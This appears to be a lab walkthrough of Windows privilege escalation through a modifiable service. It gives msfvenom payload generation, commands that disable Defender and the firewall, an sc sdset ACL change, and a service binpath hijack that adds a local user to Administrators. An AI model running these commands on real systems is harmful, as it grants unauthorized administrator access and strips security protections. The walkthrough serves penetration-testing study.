Windows Privilege Escalation
Last updated
Last updated
Making use of an exe that is vulnerable to unquoted service paths
Target Windows machine has a non-privileged user: localuser
Use MSFVenom: Generate an executable to push the localuser to the administrators group (ASCService.exe)
#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe// python server
python3 -m http.serverRun the following as powershell administrators
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -MAPSReporting 0
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled FalseNavigate and download the payloads
move these downloads to the C:/ folder
Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.
# Run cmd as administrator
sc sdset AdvancedSystemCareService9 D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)You should see a response of [SC] SetServiceObjectSecurity SUCCESS.
Search cmd > right click > run as diff user
C:\ > net localgroup administrators
Run check for services information
C:/> WINpeasX64.exe CMD servicesinfoA few sections often used for privilege escalation are the
Interesting Services -non Microsoft-
Modifiable Services sections.
Now query the service using
sc qc AdvancedSystemCareService9
#This service runs as LocalSystemNext attempt to start and stop the service using:
net stop AdvancedSystemCareService9Now we try to modify the service binpath to point to our new executable. Add a new additional user:
sc config AdvancedSystemCareService9 binpath= "c:\ASCService.exe"Now start our payload executable:
net start AdvancedSystemCareService9Since we have permissions and can modify the service itself, we leverage the service to add the localuser to the local admin group
net localgroup administrators
